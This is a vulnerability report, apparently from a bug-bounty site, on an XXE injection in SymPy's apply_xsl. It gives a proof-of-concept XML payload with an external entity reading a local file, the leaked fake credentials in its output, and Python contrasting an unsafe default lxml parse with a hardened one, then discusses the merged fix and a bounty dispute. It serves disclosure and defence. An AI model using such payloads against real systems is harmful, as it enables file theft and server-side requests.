XML External Entity (XXE) injection in sympy in sympy/sympy
Reported on Mar 29th 2023
Description
Sympy is an open source computer algebra system written in pure Python. Sympy is vulnerable to an XML External Entity (XXE) injection in the apply_xsl() functionality of Sympy due to the usage of etree.XML, which resolves external entities by default.
Proof of Concept
# PoC.py
from sympy.utilities.mathml import apply_xsl
# stylesheet shipped with sympy; the input document is what carries the payload
xsl = 'mathml/data/simple_mmlctop.xsl'
mml = '''
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///d:/test/sensitive.txt"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
'''
# apply_xsl parses mml with etree.XML, so the external entity is expanded
# with the file contents before the stylesheet is applied
res = apply_xsl(mml, xsl)
print(res)
OUTPUT:
<?xml version="1.0"?>
<userInfo>
<firstName>John</firstName>
<lastName>
SENSITIVE INFORMATION.
USERNAME: TEST
PASSWORD: TEST
</lastName>
</userInfo>
Impact
As this is vulnerable to XXE, it may lead to arbitrary file read, DoS, or SSRF.
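The parser call behind the report and a hardened counterpart side by side, as an added example that is not SymPy's code or its merged fix; it writes its own temp file in place of sensitive.txt and assumes lxml is installed:

```python
import os
import re
import tempfile
from pathlib import Path
from lxml import etree

# Constructed stand-in for the report's "sensitive.txt".
SECRET = "USERNAME: TEST\nPASSWORD: TEST\n"

def make_secret_file():
    """Write the constructed secret to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET)
    return path

def xxe_document(path):
    """Document shaped like the PoC: an external entity pointing at `path`."""
    return (
        '<!DOCTYPE replace [<!ENTITY ent SYSTEM "%s">]>'
        "<userInfo><firstName>John</firstName>"
        "<lastName>&ent;</lastName></userInfo>" % Path(path).as_uri()
    )

def parse_default(xml):
    """What apply_xsl did: etree.XML with lxml's defaults, entities resolved."""
    return etree.XML(xml)

def parse_hardened(xml):
    """Same parse with entity substitution and network access switched off."""
    parser = etree.XMLParser(resolve_entities=False, no_network=True)
    return etree.XML(xml, parser=parser)

def safe_parse(xml):
    """Defence in depth: reject any DTD before it reaches the parser at all."""
    # MathML input has no legitimate need for a DOCTYPE; this text check
    # complements the parser settings above, it does not replace them.
    if re.search(r"<!DOCTYPE", xml, re.IGNORECASE):
        raise ValueError("DTD/DOCTYPE declarations are not accepted")
    return parse_hardened(xml)

def last_name_text(xml, parser_func):
    """Text of <lastName> as seen by parser_func; '' if rejected or unexpanded."""
    try:
        root = parser_func(xml)
    except (ValueError, etree.XMLSyntaxError):
        return ""
    return root.findtext("lastName") or ""

if __name__ == "__main__":
    doc = xxe_document(make_secret_file())
    print("default  :", repr(last_name_text(doc, parse_default)))
    print("hardened :", repr(last_name_text(doc, parse_hardened)))
```

With the default parser the secret lands in <lastName> exactly as in the report's output; the hardened parser leaves the entity reference unexpanded and safe_parse refuses the document outright.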
@maintainer Please use the above patch to mitigate this vulnerability. Thanks.
@admin Can you please check the comments in https://github.com/sympy/sympy/pull/24997. And send this report to appropriate people. Thanks.
Can you please explain the attack vector here? If you use Python, you can just open the file d:/test/sensitive.txt directly using open("d:/test/sensitive.txt").
A PR has been merged to fix this: https://github.com/sympy/sympy/pull/25007
Also another PR for the imminent 1.12 release: https://github.com/sympy/sympy/pull/25010
Can you confirm if that fixes the issue?
Hi @maintainer, tested on the latest code base, and I can confirm that the issue is resolved.
Can you please validate this issue, confirm the fix and assign a CVE? Thanks.
Hi @maintainer, version 1.12 is released with the fix, can you please mark this as VALID and add the patch!
https://github.com/sympy/sympy/commit/2c3de5f49f294b7f84b3d58fe15e90b49b9316dc
Hi @admin / @psmoros, I saw a comment in sympy which says
Hi team! To shed some light on what we do; a company that depends on SymPy is sponsoring security research into your project: up to $1040 per valid vulnerability for the researcher and $260 for the maintainer.
https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185
Can you please allocate the bounty as per the comments? Thanks.
Hi @admin, can you please help the maintainer solve the issue, such as how to add the patch in a comment?
Hi @admin,
Just a reminder to adjust the disclosure bounty up to $1040 per valid vulnerability. And help the maintainer to add patches. Thanks.
Hey ready-research, I've reached out to @psmoros to get more information on this :)
Is there anything I should be doing here? The issue is fixed now and the fix is released.
Yes, please mark it as fixed and publish it using the green button above the comment section "Mark as fixed"
@psmoros @admin, can you please also look into the issue with the disclosure bounty? Thanks.
Hi @admin, can you please also look into the issue with the bounty?
@psmoros @Pavlos @benharvie @adam-nygate
Hi @psmoros, https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185 As per the comments, the disclosure bounty is up to $1040 per valid vulnerability, but here we have only $75. Can you please adjust the bounty to $1040?